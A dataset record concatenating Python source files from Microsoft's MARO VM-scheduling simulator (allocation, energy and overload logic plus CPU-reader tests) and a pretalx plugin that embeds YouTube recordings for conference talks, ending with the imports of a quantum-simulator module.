        return node_mapping
    def get_vm_cpu_utilization_series(self, vm_id: int) -> List[float]:
        """Get the CPU utilization series of the specific VM by the given ID."""
        if vm_id in self._live_vms:
            return self._live_vms[vm_id].get_historical_utilization_series(cur_tick=self._tick)
        return []
    def get_metrics(self) -> DocableDict:
        """Get current environment metrics information.
        Returns:
            DocableDict: Metrics information.
        """
        return DocableDict(
            metrics_desc,
            total_vm_requests=self._total_vm_requests,
            total_energy_consumption=self._total_energy_consumption,
            successful_allocation=self._successful_allocation,
            successful_completion=self._successful_completion,
            failed_allocation=self._failed_allocation,
            failed_completion=self._failed_completion,
            total_latency=self._total_latency,
            total_oversubscriptions=self._total_oversubscriptions,
            total_overload_pms=self._total_overload_pms,
            total_overload_vms=self._total_overload_vms
        )
    def _register_events(self):
        """Register handlers for request and action events."""
        # Register our own events and their callback handlers.
        self._event_buffer.register_event_handler(event_type=Events.REQUEST, handler=self._on_vm_required)
        # Generate decision event.
        self._event_buffer.register_event_handler(event_type=MaroEvents.TAKE_ACTION, handler=self._on_action_received)
    def _update_vm_workload(self, cur_tick_cpu_utilization: dict):
        """Update all live VMs CPU utilization.
        The length of VMs utilization series could be difference among all VMs,
        because index 0 represents the VM's CPU utilization at the tick it starts.
        """
        for live_vm in self._live_vms.values():
            # NOTE: Some data could be lost. We use -1.0 to represent the missing data.
            if live_vm.id not in cur_tick_cpu_utilization:
                live_vm.add_utilization(cpu_utilization=-1.0)
            else:
                live_vm.add_utilization(cpu_utilization=cur_tick_cpu_utilization[live_vm.id])
                live_vm.cpu_utilization = live_vm.get_utilization(cur_tick=self._tick)
        # Pending VMs also keep collecting readings while waiting for a decision.
        for pending_vm_payload in self._pending_vm_request_payload.values():
            pending_vm = pending_vm_payload.vm_info
            if pending_vm.id not in cur_tick_cpu_utilization:
                pending_vm.add_utilization(cpu_utilization=-1.0)
            else:
                pending_vm.add_utilization(cpu_utilization=cur_tick_cpu_utilization[pending_vm.id])
    def _update_pm_workload(self):
        """Update CPU utilization occupied by total VMs on each PM."""
        for pm in self._machines:
            total_pm_cpu_cores_used: float = 0.0
            for vm_id in pm.live_vms:
                vm = self._live_vms[vm_id]
                total_pm_cpu_cores_used += vm.cpu_utilization * vm.cpu_cores_requirement
            pm.update_cpu_utilization(vm=None, cpu_utilization=total_pm_cpu_cores_used / pm.cpu_cores_capacity)
            pm.energy_consumption = self._cpu_utilization_to_energy_consumption(
                pm_type=self._pm_type_dict[pm.pm_type],
                cpu_utilization=pm.cpu_utilization
            )
    def _overload(self, pm_id: int):
        """Overload logic.
        Currently only support killing all VMs on the overload PM and note them as failed allocations.
        """
        # TODO: Future features of overload modeling.
        #       1. Performance degradation
        #       2. Quiesce specific VMs.
        pm: PhysicalMachine = self._machines[pm_id]
        vm_ids: List[int] = [vm_id for vm_id in pm.live_vms]
        if self._kill_all_vms_if_overload:
            for vm_id in vm_ids:
                self._live_vms.pop(vm_id)
            pm.deallocate_vms(vm_ids=vm_ids)
            self._failed_completion += len(vm_ids)
        self._total_overload_vms += len(vm_ids)
    def _cpu_utilization_to_energy_consumption(self, pm_type: dict, cpu_utilization: float) -> float:
        """Convert the CPU utilization to energy consumption.
        The formulation refers to https://dl.acm.org/doi/epdf/10.1145/1273440.1250665
        """
        power: float = pm_type["power_curve"]["calibration_parameter"]
        busy_power: int = pm_type["power_curve"]["busy_power"]
        idle_power: int = pm_type["power_curve"]["idle_power"]
        cpu_utilization /= 100
        cpu_utilization = min(1, cpu_utilization)
        return idle_power + (busy_power - idle_power) * (2 * cpu_utilization - pow(cpu_utilization, power))
    def _postpone_vm_request(self, postpone_type: PostponeType, vm_id: int, remaining_buffer_time: int):
        """Postpone VM request."""
        if remaining_buffer_time >= self._delay_duration:
            if postpone_type == PostponeType.Resource:
                self._total_latency.due_to_resource += self._delay_duration
            elif postpone_type == PostponeType.Agent:
                self._total_latency.due_to_agent += self._delay_duration
            postpone_payload = self._pending_vm_request_payload[vm_id]
            postpone_payload.remaining_buffer_time -= self._delay_duration
            # Re-issue the request event after the delay.
            postpone_event = self._event_buffer.gen_cascade_event(
                tick=self._tick + self._delay_duration,
                event_type=Events.REQUEST,
                payload=postpone_payload
            )
            self._event_buffer.insert_event(event=postpone_event)
        else:
            # Fail
            # Pop out VM request payload.
            self._pending_vm_request_payload.pop(vm_id)
            # Add failed allocation.
            self._failed_allocation += 1
    def _get_valid_pms(
        self, vm_cpu_cores_requirement: int, vm_memory_requirement: int, vm_category: VmCategory
    ) -> List[int]:
        """Check all valid PMs.
        Args:
            vm_cpu_cores_requirement (int): The CPU cores requested by the VM.
            vm_memory_requirement (int): The memory requested by the VM.
            vm_category (VmCategory): The VM category. Delay-insensitive: 0, Interactive: 1, Unknown: 2.
        """
        # NOTE: Should we implement this logic inside the action scope?
        valid_pm_list = []
        # Delay-insensitive: 0, Interactive: 1, and Unknown: 2.
        if vm_category == VmCategory.INTERACTIVE or vm_category == VmCategory.UNKNOWN:
            valid_pm_list = self._get_valid_non_oversubscribable_pms(
                vm_cpu_cores_requirement=vm_cpu_cores_requirement,
                vm_memory_requirement=vm_memory_requirement
            )
        else:
            valid_pm_list = self._get_valid_oversubscribable_pms(
                vm_cpu_cores_requirement=vm_cpu_cores_requirement,
                vm_memory_requirement=vm_memory_requirement
            )
        return valid_pm_list
    def _get_valid_non_oversubscribable_pms(self, vm_cpu_cores_requirement: int, vm_memory_requirement: int) -> list:
        """PM ids that can host the VM without oversubscription."""
        valid_pm_list = []
        for pm in self._machines:
            if pm.oversubscribable == PmState.EMPTY or pm.oversubscribable == PmState.NON_OVERSUBSCRIBABLE:
                # In the condition of non-oversubscription, the valid PMs mean:
                # PM allocated resource + VM allocated resource <= PM capacity.
                if (pm.cpu_cores_allocated + vm_cpu_cores_requirement <= pm.cpu_cores_capacity
                        and pm.memory_allocated + vm_memory_requirement <= pm.memory_capacity):
                    valid_pm_list.append(pm.id)
        return valid_pm_list
    def _get_valid_oversubscribable_pms(self, vm_cpu_cores_requirement: int, vm_memory_requirement: int) -> List[int]:
        """PM ids that can host the VM under the configured oversubscription limits."""
        valid_pm_list = []
        for pm in self._machines:
            if pm.oversubscribable == PmState.EMPTY or pm.oversubscribable == PmState.OVERSUBSCRIBABLE:
                # In the condition of oversubscription, the valid PMs mean:
                # 1. PM allocated resource + VM allocated resource <= Max oversubscription rate * PM capacity.
                # 2. PM CPU usage + VM requirements <= Max utilization rate * PM capacity.
                if (
                    (
                        pm.cpu_cores_allocated + vm_cpu_cores_requirement
                        <= self._max_cpu_oversubscription_rate * pm.cpu_cores_capacity
                    ) and (
                        pm.memory_allocated + vm_memory_requirement
                        <= self._max_memory_oversubscription_rate * pm.memory_capacity
                    ) and (
                        pm.cpu_utilization / 100 * pm.cpu_cores_capacity + vm_cpu_cores_requirement
                        <= self._max_utilization_rate * pm.cpu_cores_capacity
                    )
                ):
                    valid_pm_list.append(pm.id)
        return valid_pm_list
    def _process_finished_vm(self):
        """Release PM resource from the finished VM."""
        # Get the VM info.
        vm_id_list = []
        for vm in self._live_vms.values():
            if vm.deletion_tick == self._tick:
                # Release PM resources.
                pm: PhysicalMachine = self._machines[vm.pm_id]
                pm.cpu_cores_allocated -= vm.cpu_cores_requirement
                pm.memory_allocated -= vm.memory_requirement
                pm.deallocate_vms(vm_ids=[vm.id])
                # If the VM list is empty, switch the state to empty.
                if not pm.live_vms:
                    pm.oversubscribable = PmState.EMPTY
                vm_id_list.append(vm.id)
                # VM completed task succeed.
                self._successful_completion += 1
        # Remove dead VM.
        for vm_id in vm_id_list:
            self._live_vms.pop(vm_id)
    def _on_vm_required(self, vm_request_event: CascadeEvent):
        """Callback when there is a VM request generated."""
        # Get VM data from payload.
        payload: VmRequestPayload = vm_request_event.payload
        vm_info: VirtualMachine = payload.vm_info
        remaining_buffer_time: int = payload.remaining_buffer_time
        # Store the payload inside business engine.
        self._pending_vm_request_payload[vm_info.id] = payload
        # Get valid pm list.
        valid_pm_list = self._get_valid_pms(
            vm_cpu_cores_requirement=vm_info.cpu_cores_requirement,
            vm_memory_requirement=vm_info.memory_requirement,
            vm_category=vm_info.category
        )
        if len(valid_pm_list) > 0:
            # Generate pending decision.
            decision_payload = DecisionPayload(
                frame_index=self.frame_index(tick=self._tick),
                valid_pms=valid_pm_list,
                vm_id=vm_info.id,
                vm_cpu_cores_requirement=vm_info.cpu_cores_requirement,
                vm_memory_requirement=vm_info.memory_requirement,
                remaining_buffer_time=remaining_buffer_time
            )
            self._pending_action_vm_id = vm_info.id
            pending_decision_event = self._event_buffer.gen_decision_event(
                tick=vm_request_event.tick, payload=decision_payload)
            vm_request_event.add_immediate_event(event=pending_decision_event)
        else:
            # Either postpone the requirement event or failed.
            self._postpone_vm_request(
                postpone_type=PostponeType.Resource,
                vm_id=vm_info.id,
                remaining_buffer_time=remaining_buffer_time
            )
    def _on_action_received(self, event: CascadeEvent):
        """Callback when we get an action from agent."""
        action = None
        if event is None or event.payload is None:
            # No action returned: drop the outstanding request.
            self._pending_vm_request_payload.pop(self._pending_action_vm_id)
            return
        cur_tick: int = event.tick
        for action in event.payload:
            vm_id: int = action.vm_id
            if vm_id not in self._pending_vm_request_payload:
                raise Exception(f"The VM id: '{vm_id}' sent by agent is invalid.")
            if type(action) == AllocateAction:
                pm_id = action.pm_id
                vm: VirtualMachine = self._pending_vm_request_payload[vm_id].vm_info
                lifetime = vm.lifetime
                # Update VM information.
                vm.pm_id = pm_id
                vm.creation_tick = cur_tick
                vm.deletion_tick = cur_tick + lifetime
                vm.cpu_utilization = vm.get_utilization(cur_tick=cur_tick)
                # Pop out the VM from pending requests and add to live VM dict.
                self._pending_vm_request_payload.pop(vm_id)
                self._live_vms[vm_id] = vm
                # Update PM resources requested by VM.
                pm = self._machines[pm_id]
                # Empty pm (init state).
                if pm.oversubscribable == PmState.EMPTY:
                    # Delay-Insensitive: oversubscribable.
                    if vm.category == VmCategory.DELAY_INSENSITIVE:
                        pm.oversubscribable = PmState.OVERSUBSCRIBABLE
                    # Interactive or Unknown: non-oversubscribable
                    else:
                        pm.oversubscribable = PmState.NON_OVERSUBSCRIBABLE
                pm.allocate_vms(vm_ids=[vm.id])
                pm.cpu_cores_allocated += vm.cpu_cores_requirement
                pm.memory_allocated += vm.memory_requirement
                pm.update_cpu_utilization(
                    vm=vm,
                    cpu_utilization=None
                )
                pm.energy_consumption = self._cpu_utilization_to_energy_consumption(
                    pm_type=self._pm_type_dict[pm.pm_type],
                    cpu_utilization=pm.cpu_utilization
                )
                self._successful_allocation += 1
            elif type(action) == PostponeAction:
                postpone_step = action.postpone_step
                remaining_buffer_time = self._pending_vm_request_payload[vm_id].remaining_buffer_time
                # Either postpone the requirement event or failed.
                self._postpone_vm_request(
                    postpone_type=PostponeType.Agent,
                    vm_id=vm_id,
                    remaining_buffer_time=remaining_buffer_time - postpone_step * self._delay_duration
                )
    def _download_processed_data(self):
        """Build processed data."""
        data_root = StaticParameter.data_root
        build_folder = os.path.join(data_root, self._scenario_name, ".build", self._topology)
        source = self._config.PROCESSED_DATA_URL
        download_file_name = source.split('/')[-1]
        download_file_path = os.path.join(build_folder, download_file_name)
        # Download file from the Azure blob storage.
        if not os.path.exists(download_file_path):
            logger.info_green(f"Downloading data from {source} to {download_file_path}.")
            download_file(source=source, destination=download_file_path)
        else:
            logger.info_green("File already exists, skipping download.")
        # Unzip files.
        logger.info_green(f"Unzip {download_file_path} to {build_folder}")
        tar = tarfile.open(download_file_path, "r:gz")
        tar.extractall(path=build_folder)
        tar.close()
        # Move to the correct path.
        for _, directories, _ in os.walk(build_folder):
            for directory in directories:
                unzip_file = os.path.join(build_folder, directory)
                logger.info_green(f"Move files to {build_folder} from {unzip_file}")
                for file_name in os.listdir(unzip_file):
                    if file_name.endswith(".bin"):
                        shutil.move(os.path.join(unzip_file, file_name), build_folder)
        os.rmdir(unzip_file)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from maro.backends.frame import FrameBase, FrameNode
from .physical_machine import PhysicalMachine
def build_frame(pm_amount: int, snapshots_num: int):
    """Function to build vm_scheduling Frame.
    Args:
        pm_amount (int): Number of physical machine.
        snapshots_num (int): Number of in-memory snapshots.
    Returns:
        VmSchedulingFrame: Frame instance for vm_scheduling scenario.
    """
    class VmSchedulingFrame(FrameBase):
        # One frame node per physical machine; attributes are declared on PhysicalMachine.
        pms = FrameNode(PhysicalMachine, pm_amount)
        def __init__(self):
            super().__init__(enable_snapshot=True, total_snapshot=snapshots_num)
    return VmSchedulingFrame()
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import List, Set
from maro.backends.frame import NodeAttribute, NodeBase, node
from .enums import PmState
from .virtual_machine import VirtualMachine
@node("pms")
class PhysicalMachine(NodeBase):
    """Physical machine node definition in frame."""
    # Initial parameters.
    id = NodeAttribute("i")
    cpu_cores_capacity = NodeAttribute("i2")
    memory_capacity = NodeAttribute("i2")
    pm_type = NodeAttribute("i2")
    # Statistical features.
    cpu_cores_allocated = NodeAttribute("i2")
    memory_allocated = NodeAttribute("i2")
    cpu_utilization = NodeAttribute("f")
    energy_consumption = NodeAttribute("f")
    # PM type: non-oversubscribable is -1, empty: 0, oversubscribable is 1.
    oversubscribable = NodeAttribute("i2")
    def __init__(self):
        """Internal use for reset."""
        # Cached initial values so reset() can restore them after a frame
        # reset zeroes every node attribute.
        self._id = 0
        self._init_cpu_cores_capacity = 0
        self._init_memory_capacity = 0
        self._init_pm_type = 0
        self._init_pm_state = 0
        # PM resource.
        self._live_vms: Set[int] = set()
    def update_cpu_utilization(self, vm: VirtualMachine = None, cpu_utilization: float = None):
        """Update this PM's CPU utilization.
        Either pass a VM (its weighted load is folded into the current
        utilization) or an absolute ``cpu_utilization`` value; at least one
        of the two must be given.
        """
        if vm is None and cpu_utilization is None:
            raise Exception(f"Wrong calling method {self.update_cpu_utilization.__name__}")
        if vm is not None:
            # Weighted average: existing load plus the VM's requested cores
            # scaled by its own utilization, normalized by PM capacity.
            cpu_utilization = (
                (self.cpu_cores_capacity * self.cpu_utilization + vm.cpu_cores_requirement * vm.cpu_utilization)
                / self.cpu_cores_capacity
            )
        self.cpu_utilization = round(max(0, cpu_utilization), 2)
    def set_init_state(
        self, id: int, cpu_cores_capacity: int, memory_capacity: int, pm_type: int, oversubscribable: PmState = 0
    ):
        """Set initialize state, that will be used after frame reset.
        Args:
            id (int): PM id, from 0 to N. N means the amount of PM, which can be set in config.
            cpu_cores_capacity (int): The capacity of cores of the PM, which can be set in config.
            memory_capacity (int): The capacity of memory of the PM, which can be set in config.
            pm_type (int): The type of the PM.
            oversubscribable (int): The state of the PM:
                - non-oversubscribable: -1.
                - empty: 0.
                - oversubscribable: 1.
        """
        self._id = id
        self._init_cpu_cores_capacity = cpu_cores_capacity
        self._init_memory_capacity = memory_capacity
        self._init_pm_type = pm_type
        self._init_pm_state = oversubscribable
        self.reset()
    def reset(self):
        """Reset to default value."""
        # When we reset frame, all the value will be set to 0, so we need these lines.
        self.id = self._id
        self.cpu_cores_capacity = self._init_cpu_cores_capacity
        self.memory_capacity = self._init_memory_capacity
        self.pm_type = self._init_pm_type
        self.oversubscribable = self._init_pm_state
        self._live_vms.clear()
        self.cpu_cores_allocated = 0
        self.memory_allocated = 0
        self.cpu_utilization = 0.0
        self.energy_consumption = 0.0
    @property
    def live_vms(self) -> Set[int]:
        """Set[int]: Ids of the VMs currently placed on this PM."""
        return self._live_vms
    def allocate_vms(self, vm_ids: List[int]):
        """Record the given VM ids as living on this PM."""
        for vm_id in vm_ids:
            self._live_vms.add(vm_id)
    def deallocate_vms(self, vm_ids: List[int]):
        """Remove the given VM ids from this PM's live set."""
        for vm_id in vm_ids:
            self._live_vms.remove(vm_id)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from .base_exception import MAROException
class AgentManagerModeError(MAROException):
    """Raised when an agent manager is driven in an unsupported mode."""
    def __init__(self, msg: str = None) -> None:
        # 4000 is the MARO error code reserved for this exception.
        super().__init__(4000, msg)
class MissingShaper(MAROException):
    """Raised when a required shaper has not been supplied."""
    def __init__(self, msg: str = None) -> None:
        # 4001 is the MARO error code reserved for this exception.
        super().__init__(4001, msg)
class StoreMisalignment(MAROException):
    """Raised when a ``put`` operation on a ``ColumnBasedStore`` would leave
    the underlying column lists with different lengths."""
    def __init__(self, msg: str = None) -> None:
        # 4002 is the MARO error code reserved for this exception.
        super().__init__(4002, msg)
class InvalidEpisode(MAROException):
    """Raised when ``max_episode`` passed to ``SimpleLearner.train`` is a
    negative value other than -1."""
    def __init__(self, msg: str = None) -> None:
        # 4003 is the MARO error code reserved for this exception.
        super().__init__(4003, msg)
class InfiniteTrainingLoop(MAROException):
    """Raised when the ``SimpleLearner`` training loop would never terminate."""
    def __init__(self, msg: str = None) -> None:
        # 4004 is the MARO error code reserved for this exception.
        super().__init__(4004, msg)
class MissingOptimizer(MAROException):
    """Raised when ``LearningModel.step`` is called without any optimizers."""
    def __init__(self, msg: str = None) -> None:
        # 4005 is the MARO error code reserved for this exception.
        super().__init__(4005, msg)
class UnrecognizedTask(MAROException):
    """Raised when a LearningModel carries task names that an algorithm does
    not recognize."""
    def __init__(self, msg: str = None) -> None:
        # 4006 is the MARO error code reserved for this exception.
        super().__init__(4006, msg)
class NNStackDimensionError(MAROException):
    """Raised when a learning module is given an incorrect input dimension."""
    def __init__(self, msg: str = None) -> None:
        # 4007 is the MARO error code reserved for this exception.
        super().__init__(4007, msg)
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import unittest
from maro.data_lib import BinaryConverter
from maro.simulator.scenarios.vm_scheduling import CpuReader
class CpuReaderTest(unittest.TestCase):
    """Tests for ``CpuReader`` reading CPU utilization across multiple binary files."""
    # First binary file of the three-file fixture set.
    data_path = "tests/data/vm_scheduling/vm_cpu_readings-file-1-of-test.bin"

    @classmethod
    def setUpClass(cls):
        # Bug fix: the original ran this loop directly in the class body, so
        # the CSV->binary conversion executed at import time (even when no
        # test ran) and leaked ``i``/``converter``/file-name variables as
        # class attributes. Running it once per class in setUpClass keeps the
        # same fixtures without the import-time side effect.
        for i in range(1, 4):
            meta_file = "tests/data/vm_scheduling/cpu_readings.yml"
            bin_file_name = f"tests/data/vm_scheduling/vm_cpu_readings-file-{i}-of-test.bin"
            csv_file = f"tests/data/vm_scheduling/vm_cpu_readings-file-{i}-of-test.csv"
            converter = BinaryConverter(bin_file_name, meta_file)
            converter.add_csv(csv_file)
            converter.flush()

    def setUp(self):
        # Fresh reader per test, starting from tick 0.
        self.cpu_reader = CpuReader(self.data_path, 0)

    def tearDown(self):
        self.cpu_reader.reset()

    def test_first_file_first_tick(self):
        """Tick 0 of the first file yields 4 readings."""
        cpu_utilization_dict = self.cpu_reader.items(tick=0)
        expected = 4
        self.assertEqual(expected, len(cpu_utilization_dict))

    def test_first_file_last_tick(self):
        """Tick 1 (last tick of the first file) yields 13 readings."""
        cpu_utilization_dict = self.cpu_reader.items(tick=1)
        expected = 13
        self.assertEqual(expected, len(cpu_utilization_dict))

    def test_switch_file(self):
        """Reading past the first file switches to the second one."""
        cpu_utilization_dict = self.cpu_reader.items(tick=1)
        cpu_utilization_dict = self.cpu_reader.items(tick=2)
        expected = 8
        self.assertEqual(expected, len(cpu_utilization_dict))

    def test_last_file(self):
        """Readings continue correctly through the third (last) file."""
        cpu_utilization_dict = {}
        for i in range(3):
            cpu_utilization_dict = self.cpu_reader.items(tick=i)
        expected = 8
        self.assertEqual(expected, len(cpu_utilization_dict))
        cpu_utilization_dict = self.cpu_reader.items(tick=3)
        expected = 7
        self.assertEqual(expected, len(cpu_utilization_dict))

    def test_reset(self):
        """After reset() the reader replays from the first file again."""
        self.cpu_reader.items(tick=0)
        self.cpu_reader.items(tick=1)
        self.cpu_reader.items(tick=2)
        self.cpu_reader.items(tick=3)
        self.cpu_reader.reset()
        cpu_utilization_dict = self.cpu_reader.items(tick=0)
        expected = 4
        self.assertEqual(expected, len(cpu_utilization_dict))
        cpu_utilization_dict = self.cpu_reader.items(tick=1)
        expected = 13
        self.assertEqual(expected, len(cpu_utilization_dict))
        cpu_utilization_dict = self.cpu_reader.items(tick=2)
        expected = 8
        self.assertEqual(expected, len(cpu_utilization_dict))

    def test_start_tick_not_in_first_file(self):
        """A start tick beyond the first file skips ahead correctly."""
        self.cpu_reader = CpuReader(self.data_path, 2)
        cpu_utilization_dict = self.cpu_reader.items(tick=2)
        expected = 8
        self.assertEqual(expected, len(cpu_utilization_dict))
        cpu_utilization_dict = self.cpu_reader.items(tick=3)
        expected = 7
        self.assertEqual(expected, len(cpu_utilization_dict))
# Allow running this test module directly, outside a test runner.
if __name__ == "__main__":
    unittest.main()
|
[
"/examples/cim/dqn/components/__init__.py",
"/examples/cim/dqn/components/agent.py",
"/examples/cim/dqn/components/agent_manager.py",
"/examples/cim/dqn/components/config.py",
"/examples/cim/dqn/dist_actor.py",
"/examples/cim/dqn/dist_learner.py",
"/examples/cim/dqn/single_process_launcher.py",
"/examples/cim/policy_optimization/components/__init__.py",
"/examples/cim/policy_optimization/components/agent_manager.py",
"/examples/cim/policy_optimization/components/experience_shaper.py",
"/examples/cim/policy_optimization/dist_actor.py",
"/examples/cim/policy_optimization/dist_learner.py",
"/examples/cim/policy_optimization/multi_process_launcher.py",
"/examples/cim/policy_optimization/single_process_launcher.py",
"/examples/vm_scheduling/best_fit/launcher.py",
"/examples/vm_scheduling/random/launcher.py",
"/maro/cli/grass/create.py",
"/maro/cli/grass/data.py",
"/maro/cli/grass/delete.py",
"/maro/cli/grass/executors/grass_azure_executor.py",
"/maro/cli/grass/executors/grass_executor.py",
"/maro/cli/grass/executors/grass_on_premises_executor.py",
"/maro/cli/grass/image.py",
"/maro/cli/grass/lib/agents/exception.py",
"/maro/cli/grass/lib/agents/master_agent.py",
"/maro/cli/grass/lib/agents/utils.py",
"/maro/cli/grass/lib/scripts/create_user.py",
"/maro/cli/grass/lib/scripts/delete_user.py",
"/maro/cli/grass/lib/scripts/init_build_node_image_vm.py",
"/maro/cli/grass/lib/scripts/init_node.py",
"/maro/cli/grass/node.py",
"/maro/cli/k8s/node.py",
"/maro/cli/process/agent/job_agent.py",
"/maro/cli/process/create.py",
"/maro/cli/process/delete.py",
"/maro/cli/process/executor.py",
"/maro/cli/process/utils/details.py",
"/maro/cli/utils/params.py",
"/maro/rl/__init__.py",
"/maro/rl/actor/__init__.py",
"/maro/rl/actor/simple_actor.py",
"/maro/rl/agent/__init__.py",
"/maro/rl/agent/abs_agent.py",
"/maro/rl/agent/abs_agent_manager.py",
"/maro/rl/agent/simple_agent_manager.py",
"/maro/rl/algorithms/__init__.py",
"/maro/rl/algorithms/abs_algorithm.py",
"/maro/rl/algorithms/dqn.py",
"/maro/rl/algorithms/policy_optimization.py",
"/maro/rl/dist_topologies/__init__.py",
"/maro/rl/dist_topologies/experience_collection.py",
"/maro/rl/learner/__init__.py",
"/maro/rl/learner/abs_learner.py",
"/maro/rl/learner/simple_learner.py",
"/maro/rl/models/__init__.py",
"/maro/rl/models/learning_model.py",
"/maro/rl/scheduling/scheduler.py",
"/maro/rl/scheduling/simple_parameter_scheduler.py",
"/maro/rl/shaping/__init__.py",
"/maro/rl/storage/__init__.py",
"/maro/simulator/scenarios/vm_scheduling/business_engine.py",
"/maro/simulator/scenarios/vm_scheduling/frame_builder.py",
"/maro/simulator/scenarios/vm_scheduling/physical_machine.py",
"/maro/utils/exception/rl_toolkit_exception.py",
"/tests/vm_scheduling/test_vm_scheduling_scenario.py"
] |
00mjk/pretalx-youtube
|
from django.apps import AppConfig
from django.utils.translation import gettext_lazy
class PluginApp(AppConfig):
    """Django app config registering the pretalx YouTube plugin."""
    name = "pretalx_youtube"
    verbose_name = "YouTube integration"
    class PretalxPluginMeta:
        # Metadata shown in pretalx's plugin list.
        name = gettext_lazy("YouTube integration")
        author = "Toshaan Bharvani"
        description = gettext_lazy("Embed YouTube videos as session recordings")
        visible = True
        version = "0.0.1"
    def ready(self):
        # Import signal receivers so they register on app start-up.
        from . import signals  # NOQA
--- FILE SEPARATOR ---
from django import forms
from django.utils.translation import gettext_lazy as _
class YouTubeUrlForm(forms.Form):
    """Per-submission form holding the recording's YouTube URL.

    The current value is loaded from (and keyed by) the event setting
    ``youtube_url_<submission code>``.
    """
    youtube_url = forms.URLField(required=False)

    def __init__(self, *args, **kwargs):
        self.submission = kwargs.pop("submission")
        # Pre-populate the field from the event settings; mutate the caller's
        # initial dict if one was supplied, otherwise start a fresh one.
        initial = kwargs.setdefault("initial", dict())
        initial["youtube_url"] = self.submission.event.settings.get(
            f"youtube_url_{self.submission.code}"
        )
        super().__init__(*args, **kwargs)
        # Label the field with the talk's title so organisers can tell the
        # per-submission forms apart.
        self.fields["youtube_url"].label = self.submission.title

    def clean_youtube_url(self):
        """Reject anything that does not look like a youtube.com URL."""
        from .recording import is_youtube_url

        url = self.cleaned_data["youtube_url"]
        if is_youtube_url(url):
            return url
        raise forms.ValidationError(_("Please provide a youtube.com URL!"))
--- FILE SEPARATOR ---
from pretalx.agenda.recording import BaseRecordingProvider
def is_youtube_url(url):
    """Return True if *url* looks like a youtube.com URL.

    Only checks for the "www.youtube.com/" host substring — a coarse
    filter, not full URL validation.  # TODO better validation
    """
    return "www.youtube.com/" in url


def get_embed_url(url):
    """Convert a YouTube watch URL into a privacy-friendly embed URL.

    Returns the URL unchanged if it is already an embed URL, and None when
    the URL is not recognized as a YouTube watch URL.
    """
    if "www.youtube.com/embed" in url:
        return url
    marker = "www.youtube.com/watch?v="
    # Bug fix: the original sliced from find() + len(marker) even when the
    # marker was absent (find() == -1), producing a garbage "video id" for
    # YouTube URLs that are not watch links. Require the marker explicitly.
    if marker not in url:
        return None
    video_id = url[url.find(marker) + len(marker):]
    # Bug fix: drop trailing query parameters (e.g. "&t=30") that would
    # otherwise end up inside the embed path and break the player.
    video_id = video_id.split("&", 1)[0]
    return f"https://www.youtube-nocookie.com/embed/{video_id}"
class YouTubeProvider(BaseRecordingProvider):
    """Recording provider that renders an embedded YouTube player."""

    def get_recording(self, submission):
        """Return the iframe/CSP data for *submission*, or None if unset."""
        stored_url = self.event.settings.get(f"youtube_url_{submission.code}")
        if not stored_url:
            return
        embed_url = get_embed_url(stored_url)
        if not embed_url:
            return
        iframe = f'<div class="embed-responsive embed-responsive-16by9"><iframe src="{embed_url}" frameborder="0" allowfullscreen></iframe></div>'
        return {
            "iframe": iframe,
            "csp_header": "https://www.youtube-nocookie.com",
        }
--- FILE SEPARATOR ---
from django.dispatch import receiver
from django.urls import reverse
from pretalx.agenda.signals import register_recording_provider
from pretalx.orga.signals import nav_event_settings
@receiver(register_recording_provider)
def youtube_provider(sender, **kwargs):
    """Register the YouTube recording provider for the sending event."""
    from .recording import YouTubeProvider

    return YouTubeProvider(sender)
@receiver(nav_event_settings)
def youtube_settings(sender, request, **kwargs):
    """Add a YouTube entry to the event settings navigation, if permitted."""
    if not request.user.has_perm("orga.change_settings", request.event):
        return []
    settings_url = reverse(
        "plugins:pretalx_youtube:settings",
        kwargs={"event": request.event.slug},
    )
    is_active = (
        request.resolver_match.url_name == "plugins:pretalx_youtube:settings"
    )
    return [{"label": "YouTube", "url": settings_url, "active": is_active}]
--- FILE SEPARATOR ---
from django.urls import re_path
from pretalx.event.models.event import SLUG_CHARS
from .views import YouTubeSettings
urlpatterns = [
    # Plugin settings page, nested under the event's orga settings.
    re_path(
        fr"^orga/event/(?P<event>[{SLUG_CHARS}]+)/settings/p/youtube/$",
        YouTubeSettings.as_view(),
        name="settings",
    )
]
--- FILE SEPARATOR ---
from django.contrib import messages
from django.utils.translation import gettext_lazy as _
from django.views.generic import TemplateView
from pretalx.common.mixins.views import PermissionRequired
from pretalx.submission.models import Submission
from .forms import YouTubeUrlForm
class YouTubeSettings(PermissionRequired, TemplateView):
    """Orga settings view listing one YouTube URL form per talk.

    POST requests carry an ``action`` value of the form ``url_<code>``
    identifying which talk's URL should be updated.
    """

    permission_required = "orga.change_settings"
    template_name = "pretalx_youtube/settings.html"

    def get_success_url(self):
        return self.request.path

    def get_object(self):
        # Permission checking runs against the event itself.
        return self.request.event

    def post(self, request, *args, **kwargs):
        # Default to "" so a missing/malformed "action" falls through to the
        # "talk not found" message instead of raising TypeError on the slice.
        action = request.POST.get("action", "")
        code = action[len("url_"):]
        try:
            submission = request.event.submissions.get(code=code)
        except Submission.DoesNotExist:
            messages.error(request, _("Could not find this talk."))
            return super().get(request, *args, **kwargs)
        form = YouTubeUrlForm(request.POST, submission=submission)
        if not form.is_valid():
            messages.error(request, form.errors)
            return super().get(request, *args, **kwargs)
        request.event.settings.set(
            f"youtube_url_{submission.code}",
            form.cleaned_data["youtube_url"],
        )
        messages.success(request, _("The URL for this talk was updated."))
        # The original ended with an unreachable ``return super().post(...)``
        # (both branches above return, and TemplateView defines no post());
        # that dead code has been removed.
        return super().get(request, *args, **kwargs)

    def get_context_data(self, *args, **kwargs):
        kwargs = super().get_context_data(**kwargs)
        # One prefilled URL form per scheduled talk.
        kwargs["url_forms"] = [
            YouTubeUrlForm(submission=submission)
            for submission in self.request.event.talks
        ]
        return kwargs
|
[
"/pretalx_youtube/apps.py",
"/pretalx_youtube/forms.py",
"/pretalx_youtube/recording.py",
"/pretalx_youtube/signals.py",
"/pretalx_youtube/urls.py",
"/pretalx_youtube/views.py"
] |
00mjk/qe-qhipster
|
import os
import subprocess
from zquantum.core.interfaces.backend import QuantumSimulator
from zquantum.core.circuit import save_circuit
from zquantum.core.measurement import (
load_wavefunction,
load_expectation_values,
sample_from_wavefunction,
Measurements,
)
